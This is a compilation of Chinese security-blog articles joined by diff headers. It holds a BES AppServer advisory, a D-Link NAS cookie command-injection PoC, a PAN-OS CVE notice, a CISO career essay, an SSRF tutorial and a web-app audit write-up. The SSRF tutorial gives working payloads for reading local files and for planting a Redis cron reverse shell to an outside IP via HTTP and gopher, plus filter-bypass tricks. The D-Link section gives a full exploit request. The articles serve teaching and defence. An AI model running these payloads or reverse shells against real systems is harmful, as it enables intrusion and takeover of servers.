漏洞成因宝兰德 BESAppServer 对于通过 TCP 协议传入的数据过滤不严格,允许未经授权的攻击者使用 TCP 协议向服务器发送特制的请求可以利用反序列化漏洞在未经授权的情况下远程执行任意代码或控制服务器。漏洞影响成功利用该漏洞的攻击者可以实现远程代码执行控制受影响的服务器潜在的危害包括数据泄露、系统崩溃甚至可能被用于传播勒索等恶意软件。处置优先级高漏洞类型反序列化漏洞危害等级严重触发方式网络远程权限认证要求无需权限系统配置要求默认配置可利用用户交互要求无需用户交互利用成熟度POC/EXP未公开批量可利用性可使用通用 POC/EXP批量检测/利用修复复杂度官方提供补丁修复方案影响版本 Affects 02- 9.5.2版本未安装补丁9.5.2.4703.031.T003- 9.5.5版本未安装补丁9.5.5.7266.046解决方案 Solution 03临时缓解方案1. 修改/conf/server.config 配置文件将ejb-container处的http-channel-enabled改为false将ejb-listener处的enabled改为false2. 限制访问来源地址如非必要不要将3000端口开放在互联网上。升级修复方案宝兰德官方已发布安全补丁可联系官方售后获取补丁使用。漏洞复现 Reproduction 04
**产品支持**
 
Support 
**05**
洞鉴预计11月21日发布更新支持该漏洞检测。全悉已发布规则升级包支持该漏洞利用行为的检测。雷池非HTTP流量不支持检测。
**时间线**
 
Timeline 
**06**
11月18日 互联网公开披露该漏洞11月20日 长亭安全应急响应中心发布通告
参考资料:
[1].
https://www.bessystem.com/content/b00f1e9ee0ad49b8a8525eb0a1d38da9/info
**长亭应急响应服务**
全力进行产品升级
及时将风险提示预案发送给客户
检测业务是否受到此次漏洞影响
请联系长亭应急服务团队
7*24小时守护您的安全
第一时间找到我们:
邮箱support@chaitin.com
应急响应热线4000-327-707

View File

@ -0,0 +1,27 @@
# 【成功复现】D-Link NAS远程命令执行漏洞Cookie
原创 弥天安全实验室 弥天安全实验室 2024-11-20 10:30
网安引领时代,弥天点亮未来   
 
![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
**0x00写在前面**
**本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!**
0x01漏洞介绍D-Link DNS-320等都是中国友讯D-Link公司的一款NAS网络附属存储设备。D-Link NAS设备的/cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info 接口存在远程命令执行漏洞未经身份验证的远程攻击者可利用此漏洞在cookie中执行任意系统命令写入后门文件获取服务器权限。0x02影响版本
1.D-Link DNS
0x03漏洞复现
1.访问漏洞环境
![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hA1IrYe7NqeTx2vhRGiaQYKT08LgmFppRRfk6micOUgaH2h9G2umMhwPsI881ibe5bFiaeyW6WturCYMw/640?wx_fmt=png&from=appmsg "")
2.对漏洞进行复现 POC 漏洞复现GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: */*Accept-Encoding: gzip, deflateConnection: closeCookie: username=mitian'& ps & echo 'mitian;      测试执行ps命令通过响应判断漏洞存在。3.nuclei文件测试0x04修复建议目前厂商已发布升级补丁以修复漏洞补丁获取链接https://www.dlink.com/弥天简介学海浩茫予以风动必降弥天之润弥天安全实验室成立于2019年2月19日主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子也是民间组织。主要以技术共享、交流等不断赋能自己赋能安全圈为网络安全发展贡献自己的微薄之力。口号 网安引领时代,弥天点亮未来 知识分享完了喜欢别忘了关注我们哦~学海浩茫,予以风动,必降弥天之润!   弥  天安全实验室

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,28 @@
# 【知道创宇404实验室】警惕Palo Alto PAN-OS漏洞CVE-2024-0012 和 CVE-2024-9474
404实验室 知道创宇404实验室 2024-11-20 06:13
近日国外WatchTowr lab披露了Palo Alto Networks PAN-OS中的两个严重漏洞CVE-2024-0012和CVE-2024-9474可导致未经授权的远程代码执行RCE。报告指出CVE-2024-0012为身份验证绕过漏洞而CVE-2024-9474则是远程代码执行漏洞二者可以联合使用潜在地允许攻击者在目标系统上执行恶意代码。WatchTowr lab公布漏洞细节及相关Poc另根据Palo Alto unit42报告称该漏洞在2024年11月18日存在野外利用痕迹官方确认这两个漏洞补丁已发布。
通过知道创宇旗下全球著名网络空间搜索引擎ZoomEye指纹搜索有大量的Palo Alto Networks PAN-OS系统发布再次提醒大家注意防御。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/3k9IT3oQhT0EWMdN8lVp4lmf8zaOib4XS0O6RZUMHFDichl9EgDjBQJEYsZ0TYic06eJYDk6nhwK8XXXofVZ37cGQ/640?wx_fmt=png&from=appmsg "")
**修复建议:**
1、更新到官方修复版本立即升级到Palo Alto Networks官方发布的修复版本确保系统不受该漏洞影响。
2、监测与审查检查设备日志中的可疑活动以确认是否存在异常访问或已经攻击利用的行为。
**参考资料:**
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9474

View File

@ -0,0 +1,149 @@
# 一名优秀CISO的自述是什么成就了我?
管窥蠡测 安在 2024-11-20 09:31
![](https://mmbiz.qpic.cn/mmbiz_gif/5eH7xATwT3icpLmjpDSQkXx16oAygiaJncke0vYYJvIkuzECibrQJcUW4oAedTuib1G9m372rleJRDNXNs54fBEVicg/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "")
从现实来看CISO的职责已经超越了单纯的技术控制管理扩展到了对业务战略的支撑。要想成为一名杰出的CISO仅凭技术专长是远远不够的。为了高效工作CISO需要平衡业务风险、抵御威胁同时确保组织的韧性。
Elastic的CISO Mandy Andress指出“这一角色已经转变不再仅仅关注技术或合规性而是成为了一名需要了解业务战略以便在应对风险与在最具影响力的领域投资之间做出权衡决策的业务领导者。”
随着这一思维方式的转变安全事件被视为一种必然存在现在的重点是如何为安全事件的发生做好准备而不是去假设它不会发生。Andress对此回忆道“20年前如果发生数据泄露CISO往往会成为替罪羊并面临失业的风险因为当时我们追求的是零事件。”然而当下的人们已经接受了安全设置并非尽善尽美的事实因此组织必须专注于提升韧性并为安全事件的发生做好准备。
![](https://mmbiz.qpic.cn/mmbiz_png/5eH7xATwT38W6GuVaNvnF21icAdlibLoTfKZD1icFqUqD4dGOw3EtGAKJbDvwUONOViaAINftcIicgwyx2ePwvtHVQw/640?wx_fmt=png&from=appmsg "")
**韧性和协调**
过去安全设置被视为一种非黑即白的二元选择——开或关。但现在安全计划的设计需要能够帮助组织在事件发生时以最小的影响进行响应。因此可以说响应和韧性规划是当下的重中之重其涉及网络安全团队和业务运营团队的协作并要求CISO在整个组织中进行协调特别是在事件发生时。
Andress表示“现在越来越多的人员会参与这一流程。因此如果发生安全事件涉及的将不仅仅是安全团队还包括公关团队、通信团队甚至可能包括高管这取决于事件的规模和严重程度。”
此外CISO还在预算讨论中发挥着领导作用。过去预算资金的分配往往伴随着尽可能多做事的要求但如今这些讨论已经变得更加细致入微。Andress指出“这一角色的难点在于我们需要认识到尽管有很多我们希望能够以不同方式处理的事情也有很多我们知道可以做得更好的事情但这些并不是当前业务的重点。”
**关于SecOps与GRCCISO的理想职业背景**
CISO的出身背景具备多样化其可能源自学术殿堂、职场磨砺或专业认证然而随着网络安全需求的持续演变这些背景差异正被逐渐淡化。
据前CISO及现任董事会顾问Paul Connelly观察以往SecOps背景的专家多聚焦于运营层面而GRC背景的专家则侧重于通过合规性管理来降低风险。Connelly表示“诚然信息安全需要一定的技术基础但CISO的角色并非限定于工程师或开发者。”
CISO需对信息安全职责有全面的认知但其职业起点并不局限于某一特定领域无论是IT部门还是内部审计团队均可成为CISO的起点而多元的行业与公司经历能够赋予他们独特的思考视角。尤为重要的是现代CISO需将安全工作与业务目标紧密结合。Connelly强调“相较于仅在SecOps或其他单一领域深耕的晋升者那些在组织内部历经多岗锻炼、视野开阔的CISO们往往具备更多的竞争优势。”
在规模较大的组织中管理才能、领导力以及商业洞察力的重要性超越了技术能力。而在小型团队中每位成员都需扮演多重角色CISO通常还需担当技术领航者的重任。Connelly补充道“此时具备SecOps等技术基础便显得尤为重要了。”
最为关键的是CISO需具备引领安全议程的能力。为了赢得董事会及高管层的信任他们需深入理解信息安全业务的精髓。为此网络安全领导力课程应运而生其旨在培养能够跨越业务领域、引领安全变革的领导者。
Connelly表示“我们的目标是培养出既具备商业智慧又擅长沟通且能与法律、审计等部门紧密协作的网络安全领导者这是当今CISO职位领导力的理想组合。”
作为资深导师Connelly为CISO们的职业发展及领导力塑造提供了宝贵建议。他建议大型组织中的CISO积极争取轮岗机会以锻炼领导力。而若缺乏此类机会那些有志于提升领导力的CISO则需主动寻求指导并建立长期以业务目标为导向的合作关系这可促进个人成长。Connelly建议道“作为CISO你需要找到一位愿意花时间为你提供建议、反馈并能助你明确发展方向的导师。”
Connelly进一步指出在寻找导师时应先明确自身的需求再筛选潜在的导师人选并通过直接联系或共同联系人建立沟通渠道。为了充分利用这段关系学员应设定明确的目标在每次交流中主导对话同时保持开放态度接纳导师的意见与建议并根据实际情况进行调整。“在建立这段关系之初你需明确想要实现的目标或那些希望解决的难题。”
**CISO的角色已转变为关键影响者**
如今CISO的职责不再局限于技术层面其有效性更多地依赖于在组织内部建立影响力。为了确保安全能成为组织整体流程和职责的一部分CISO必须积极构建人际关系并与多个团队协同工作。
对于CISO来说影响力是推动安全项目的核心要素。正如Andress所言过去那种单纯依靠技术解决方案的时代已经过去现在的关键在于倾听并综合各方观点。因此寻求共同解决方案至关重要而这种咨询方法对CISO有效履行其职责具有重大意义。Andress表示“这就是影响力的体现即了解如何与不同的人建立联系进行个性化交流并灵活应对各种情况。”
![](https://mmbiz.qpic.cn/mmbiz_png/5eH7xATwT38W6GuVaNvnF21icAdlibLoTfslWI4CTSkbv9wv3rXYNlL5WDrNT0jjtrYHrP7sUHV0szHndH2RgpMg/640?wx_fmt=png&from=appmsg "")
要实现这一目标需要深入理解不同团队的语言、需求和限制从而促进更加积极的互动和讨论。Andress强调“如果你带着这是唯一可行方法的想法去沟通那么很可能会引发对立关系而如果你以这是我们共同目标我们该携手合作的态度出发那么你就可以将焦点放在我们为什么要这么做以及它将如何助力业务成功或满足客户需求从而营造出一种更加积极的互动氛围。”
网络安全招聘PlaceMe Recruitment的招聘主管Killian OLeary也认同这一点他认为创造共同目标、吸引利益相关者和发挥影响力是CISO的重要特质。
在过去CISO往往是一个相对孤立的角色适合某种特定性格类型的人员而现在这一角色正逐渐转变为强调领导力和协作。OLeary指出“在招聘新CISO时组织对这些品质给予了高度重视。领导层正在寻找那些具有魅力、能够吸引追随者、并让追随者认同安全路线图的CISO。”
根据OLeary的经验对于现代CISO来说技术专长固然重要但同样重要的是要认识到安全态势对不同的人而言有着不同的意味这便要求了CISO需要了解不断变化的威胁以能够引起领导层共鸣的方式提供见解并在整个组织中培养安全思维。OLeary强调“优秀的CISO具备一定的魄力因为他们能够进行艰难的对话以友好的方式施加影响和提供建议并了解他们的听众同时推动他们的议程来赋能业务。”
然而当组织未能充分理解CISO的角色时可能会导致职位描述不匹配并列出一系列与CISO必须匹配的技术能力从而使情况变得复杂。
OLeary认为组织需要了解CISO是如何运作的、CISO将与谁接触以及CISO将与谁密切合作。在某些情况下像OLeary这样的招聘人员可能会解释如果候选人拥有更多样化的经验哪怕他们的任期较短或在一家组织的经验不符合职位模板他们仍能胜任这个角色。OLeary强调“如果有人接触过许多不同的行业、挑战和业务类型那么他们的经验就会更加全面。”
OLeary认为成长心态和适应性等个人品质将使CISO在这种多变的环境中茁壮成长。“任何优秀的CISO都会把此职位看作是一个正在进行的工作而不是一个完成的作品因为他们需要随着角色的发展而不断进步。”
所有人都会共识对于CISO来说其决定性的因素是激情即对角色的激情和对确保组织安全的激情这才是优秀CISO的核心。OLeary总结道“这种激情是重要的个人动力并且在团队中具有传染性有助于激发组织上下对保护组织、客户和员工的使命和信心。因此优秀的CISO始终会对网络安全充满热情并致力于终身学习和改进。”
**国内安全专家的建议**
优秀的CSO/CISO需要具备哪些特质又是什么能够成就这些特质国内安全专家如此建议。
**owasp广东负责人刘志诚**
表示对优秀的CSO/CISO而言首先是业务能力要对企业的业务具备充足的了解包括目标、资源、流程、风险、核心竞争力等只有了解业务才能做好业务的支撑在保持目标一致的情况下协调安全风险达成共识落实安全控制措施。
其次是全栈的技术体系能力,信息化技术日新月异,没有足够的全栈技术视野,在风险识别与判断,安全控制措施能力建设和运营落地的场景化上有所欠缺,很难构建主动防御纵深防御的安全防线。
第三通用的管理能力项目能力产品能力沟通、协作、预算成本产业互动分享传承无论是文字还是语言对一个CSO而言都需要全面而综合的素质与管理能力如果缺少其中的关键环节必须主动学习快速补足。
第四,要具备安全的全局的知识架构和实践经验,显性知识体系有很多路径,学历、证书,体系化的学习可以获得,隐性知识需要长期沉浸、萃取、提炼、抽象、总结,形成自己的全局的安全观,并且持续学习,维持知识库的更新。“经验这个事情,很多时候需要机会去体验和历练,当然,分享案例和实践书籍都是成长路上不可或缺的精神食粮。这一点需要积累、沉淀,很难速成,这也是为什么安全负责人这么稀缺的关键原因。”
![](https://mmbiz.qpic.cn/mmbiz_png/5eH7xATwT38W6GuVaNvnF21icAdlibLoTf5IuGTVs2hS3RAJjh1nHyP20MAF1oNcUibK9IBTtYdRef4rb5XbibjuiaQ/640?wx_fmt=png&from=appmsg "")
**某集团 IT安全负责人李晓文**
表示企业面临很多的商业风险从Cyber Security的视角来看 CSO/CISO要应对的是信息资产被“窃”、数字化的业务流程被蓄意破坏等导致企业遭受直接或间接的经济损失在数字化转型的大背景下优秀的 CSO/CISO必须让安全成为业务及在线流程的一部分简述需要具备的能力如下:
![](https://mmbiz.qpic.cn/mmbiz_png/5eH7xATwT38W6GuVaNvnF21icAdlibLoTf980C66ibSWDFKHce4aedok4a3rRVt8m7EtLBm2NH2NyGvkEweia4CsZw/640?wx_fmt=png&from=appmsg "")
[ 1] 理解并承接业务战略的能力:安全已成为不可脱离的部分,是业务基本保障不可缺少的一部分,至少要从支持业务发展、降低商业风险、遵从法律法规三个方向来负责安全相关的事宜,并将承接后的战略转化为战术项目。
[ 2]风险评估的能力:基于治理体系的模式,熟悉和理解业务,并立足科学的而非主观的风险评估,确保安全决策的投资收益比,安全技术能力的实施应适度超前,结合情报,构建持续的主动防御以更快响应可能新出现的威胁。
[ 3]持续学习的能力理解企业的基础投资和技术创新无论是企业的研发或是企业的IT数字化的进程中有些创新技术会带来颠覆性的改变如何保护因这些技术创新产生的商业秘密或因此伴生的风险需要持续学习和敏锐的洞察力。
[4 ]沟通能力:向上沟通-将战略承接转换为有数据支撑且可视的价值以持续的获取管理层的投资;横向沟通-服务和保障业务,横向拉通业务对安全的持续理解和认可;向下沟通- 赋能团队,一支善于作战和持续成长并产生合力的专业团队是业务信赖的基石。
[ 5]组织能力:应急响应不仅仅是团队的应急预案和日常演练,如何提高跨部门的应急响应能力更至关重要,需及时响应入侵攻击,最小化对业务的影响或破坏,应组织跨部门的模拟演练,以提升企业实时的响应能力。
**某证券机构安全负责人蒋琼**
表示优秀的CSO/CISO需要具备安全或泛安全如风控合规审计方面专业基础同时对于人员管理方面需要有足够的理论包括实践积累。“安全是个壁垒较高的行业作为CSO尤其需要懂得尊重技术尊重人才尊重安全本身具有的复杂性特点。当然分析力、逻辑力、表达力这几项管理类人才在职场上的能力项都是成为一名优秀的CSO所要具备的核心能力。”
**某集团安全专家梁龙亭**
表示有自驱动力、不断学习、不断超越自我的人群更适合担任CSO/CISO因为信息技术不断发展攻击手段不断更新魔高一尺CSO/CISO必需道高一丈。CSO/CISO可以不必直接与黑客开展对抗但是针对黑客的攻击必须熟知市场上有哪些解决方案各个解决方案的优缺点也要能够独立判断一旦需要购买相关产品或者服务时CSO/CISO要能够为公司找到性价比最高的解决方案。
此外梁龙亭认为渗透测试人群更可能成为CSO一是具有“技术安全”的实操能力再辅以“管理安全“的系统思维研究学习所有安全相关的“法律法规”就具备了CSO的三大经典能力。从技术走来的CSO/CISO顺流而下左右逢源一泻千里CSO/CISO最终会去实向虚形成“安全哲学”成长为安全思想“大家”而从审计、安全认证咨询走来的CSO/CISO艰难走向“技术安全”这座大山逆流而上且进且退避实就虚终将难以名副其实。
原文地址:
What makes a great CISO | CSO Online
作者:
Rosalyn Page  网络安全领域的记者
**END**
![](https://mmbiz.qpic.cn/mmbiz_jpg/5eH7xATwT3icpLmjpDSQkXx16oAygiaJncnia0kl72sBlgJQlKdaWJ6GQnULdjmQ7McMvLAUBmCOeXnSkHjjM5QSQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
点击这里阅读原文

View File

@ -0,0 +1,168 @@
# 一文读懂SSRF漏洞
simple学安全 simple学安全 2024-11-20 10:56
目录
![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKz5ulJQIic4ickzQM8DBLKpwsVfibrbZQ1vhyCIs7yAB7CCiaRhzxg03QccQ/640?wx_fmt=png&from=appmsg "")
简介
SSRF全称服务器端请求伪造是一种由攻击者构造请求由服务器端发起请求的漏洞正由于这一点SSRF攻击的目标是外网无法访问的内网系统。
漏洞出现的原因是web应用程序提供了从其他服务器应用获取数据的功能却没有对目标地址做过滤和限制。导致存在漏洞的应用成为攻击者的跳板机。
漏洞利用
1、**读取服务器本地文件**
利用
file协议
可以读取本地文件:
```
Windows
file://127.0.0.1/c:/ 访问本地C盘
file://localhost/d:/ 访问本地D盘
file:///e:/ 访问本地E盘
Linux
file:///etc/hosts
```
现有 http://192.168.1.128/ssrf.php?url= 存在SSRF漏洞可利用file协议读取本地文件
```
?url=file:///c:/windows/win.ini
?url=file://127.0.0.1/c:/windows/win.ini
?url=file://localhost/c:/windows/win.ini
```
![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKzYu8lW8iaibVHX2jwrpUT3PshdcSTfqfiaoBSQFc0JUalB8YsW6pg7BflA/640?wx_fmt=png&from=appmsg "")
2、**收集内网信息**
方法一直接将参数值设置为内网地址附带端口号判断内网主机端口开放情况这里探测到服务器开放3306端口
```
?url=127.0.0.1:3306
```
![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKzMwh3es6q69gyyHQzXru3PmhM3Bmwklib5PicEAlhLjnibnSCmcVkpbbgw/640?wx_fmt=png&from=appmsg "")
方法二:利用
dict协议
探测端口dict协议格式如下
```
dict://ip:port/命令:参数
```
其中命令和参数不是必须的。
使用dict协议探测到服务器开放3306端口
```
?url=dict://127.0.0.1:3306/
```
![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKzMB6ERHUzoWGkXZLTuyFyjnbXxp3tyt7ex1nCicf86QJuJ8iak7zxg3zg/640?wx_fmt=png&from=appmsg "")
3、**攻击内网redis**
ssrf漏洞常用于攻击内网redis服务可先使用file协议读取服务器的网络配置文件获得内网ip以及子网掩码随后使用收集内网信息的方法探测内网的redis服务常用端口6379。这里探测到172.19.0.2存在redis服务
方法一利用http协议
1redis是通过换行符区分每条命令的可以使用%0d%0a代表换行符达到一次传入多条命令的目的利用redis写计划任务反弹shell
```
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.11.132/4444 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
```
2特殊字符进行url编码换行符使用%0d%0a
```
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.132%2F4444%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave
```
3拼接前还需要在前后加上一些字符表示开始和结束
```
开头start%0d%0a%0d%0a
结尾:%0d%0a%0d%0aend
其中start和end可以是任何字符串没有要求
```
4得到最终payload
```
start%0d%0a%0d%0aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.132%2F4444%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0d%0a%0d%0aend
```
5发送攻击请求包成功反弹shell
```
?url=http://172.19.0.2:6379/start%0d%0a%0d%0aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.132%2F4444%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0d%0a%0d%0aend
```
![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKzGzJOQApw2SeNib48xEM7SHCazv1rLVficvZ57ZlqfdHv0AQOSFT4Zpibw/640?wx_fmt=png&from=appmsg "")
方法二:利用
gopher协议
攻击内网redisgopher协议可以构造任意的tcp/ip数据包格式如下
```
gopher://ip:port/_数据
```
1可用如下工具生成反弹shell的payload
https://github.com/tarunkant/Gopherus
![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKzgaLoA92cae4Aiadm3enH3er0wlOlN9yvMaC4mBcAibCgE7CofISlKdvg/640?wx_fmt=png&from=appmsg "")
其中127.0.0.1:6379要换成实际的存在redis服务的地址。
2由于服务端接受数据后会自动进行一次url解码为了保持结构完整需要对gopher协议的数据再进行一次url编码
```
gopher://192.168.11.132:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252469%250D%250A%250A%250A%252A%2F1%2520%252A%2520%252A%2520%252A%2520%252A%2520bash%2520-c%2520%2522sh%2520-i%2520%253E%2526%2520%2Fdev%2Ftcp%2F192.168.11.132%2F1234%25200%253E%25261%2522%250A%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252415%250D%250A%2Fvar%2Fspool%2Fcron%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25244%250D%250Aroot%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
```
3最后作为参数发送请求包
```
?url=gopher://192.168.11.132:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252469%250D%250A%250A%250A%252A%2F1%2520%252A%2520%252A%2520%252A%2520%252A%2520bash%2520-c%2520%2522sh%2520-i%2520%253E%2526%2520%2Fdev%2Ftcp%2F192.168.11.132%2F1234%25200%253E%25261%2522%250A%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252415%250D%250A%2Fvar%2Fspool%2Fcron%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25244%250D%250Aroot%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
```
绕过技巧
1、**本地回环地址**
将本地回环地址http://127.0.0.1/改为http://127.1/
2、**双重URL编码混淆**
对请求的url进行双重url编码例如http://127.1/admin改为http://127.1/%2561dmin对a进行了双重url编码。
3、**"@"符号绕过**
该绕过的原理是http://
127
.0.0.1
/a
dmin与http://xxx.com@127.0.0.1/admin
这两个请求是
一样的
也就是说
对于限制了域名的网站,可以通过这种方法实现绕过
修复建议
1、限制请求的端口只能为web端口例如80、8080
2、只允许发起http和https的请求
3、采用白名单的方式限制访问的目标地址禁止访问内网ip
4、屏蔽返回的详细信息
END
**查看更多精彩内容,关注**
**simple学安全**

View File

@ -0,0 +1,81 @@
# 一次黑盒转变白盒前台漏洞审计过程
原创 Ambition 进击安全 2024-11-20 06:11
**免责申明**
本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。
**一、前言******
    在一天跟某位师傅闲聊的时候,突然给了一个站点,说自己的项目打不下,然后有了这个文章。
**二、黑盒测试******
****
在拿到站点的时候,发现目标网站是一个经典的登录框,并且也没有账号。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzpRxMahc3mHKicLKvaw4xxOQrokdbbPyW6T6nQJDu4rLuicf5jGg5LkvA/640?wx_fmt=png&from=appmsg "")
最终在经历漫长的第一次手工爆破就进去了。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzk3dhBMuIb0Y7CR0uybhaAYOicfFjMr11TCUkc662lJwEicmPz33EmJkQ/640?wx_fmt=png&from=appmsg "")
最终找到上述上传点,可以直接进行上传一句话,但是一个漏洞肯定是不够交差的,于是这里开始了白盒之路。
**三、白盒测试******
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzbIw81ztmVahWbicbTRvX9kmRdbkv8hUibTQUicLl9Xxt1Muicer3icbrFGA/640?wx_fmt=png&from=appmsg "")
拿到源码之后其实可以直接看出来是ThinkPHP开发的这里先定位我们的上传点。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzx5BLFaKqiccTicY2lHObeloz86c5ctjGVycia89wSu5aSHEZuuj1Wob4A/640?wx_fmt=png&from=appmsg "")
根据路径进行定位到相关方法处。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzXQrnbZJCIs7DTNMkicOqrkWicKlibdFubn9IiaYfUZ3vDia3YZn7pGGCPMQ/640?wx_fmt=png&from=appmsg "")
可以看到直接进行了相关的上传跟入方法local方法。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzt3Zic3ejYiaFyc5uKTlI536KkCZiaibacTcC2lYYnM9q8zBMxkhfgPyfIQ/640?wx_fmt=png&from=appmsg "")
可以看到也没有什么过滤我们可以直接上传相关文件其中record只是获取到一些文件信息但是我们的目的还是分析别的漏洞。
这里直接看前台功能发现一个地方存在泄露。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzcbCIPC6FP2S5CMUmplFbnQ29E66FnlaeJQ1wicHtjPKsyZibavTcVFhg/640?wx_fmt=png&from=appmsg "")
这里传递一个参数为sid并且放入数据库查询并且返回出来了相关信息尝试验证一下。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLz9J0KDdxdIFPzPN0oBMQtA5UOQo5DA3yPw6sRvqhKVHElSy1JH2OytQ/640?wx_fmt=png&from=appmsg "")
连续试了好几个豆没找到,这里重新回去看代码。
**四、加解密脚本编写******
****
这里查看代码发现对于传入的参数进行了后端的加解密,如下图。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLz6LhNmgOknn5fQT6zs53GFsHvdPKfeTTo3zWgzISiassrQk8NlTnge8Q/640?wx_fmt=png&from=appmsg "")
其中讲传入的参数放入到了hou_dycrypt当中进行了解密那我们传递的一定要是加密的信息这里跟入方法查看一般加解密的方法都是在一个类当中存放的。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzn0NIZqBv6aDT58abKhANcuPiaDDJm9hC33MKEj3AwLgU60qaXicseZvg/640?wx_fmt=png&from=appmsg "")
通过名称可以发现一个加密一个解密,这里将代码摘取下来测试。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzMIulQo1ict0StUX80t84Zw8XLDPhicXPJVibIgHZsRuOveKc9V16BLLNg/640?wx_fmt=png&from=appmsg "")
传入加密值测试。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzDog3WkfWtQnAdO9cF1vUjfIhst9Tx9cgFiadCF4qvIptlsjHibxt3jyQ/640?wx_fmt=png&from=appmsg "")
哦吼!,还有一个图片地址,是个人照片,漏洞+1
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzjKkKR7tS7kl1BYbblZBJWhcZibvxUCYda2BgfYDicR0eEjwIsIPg6ovA/640?wx_fmt=png&from=appmsg "")
**五、完结**
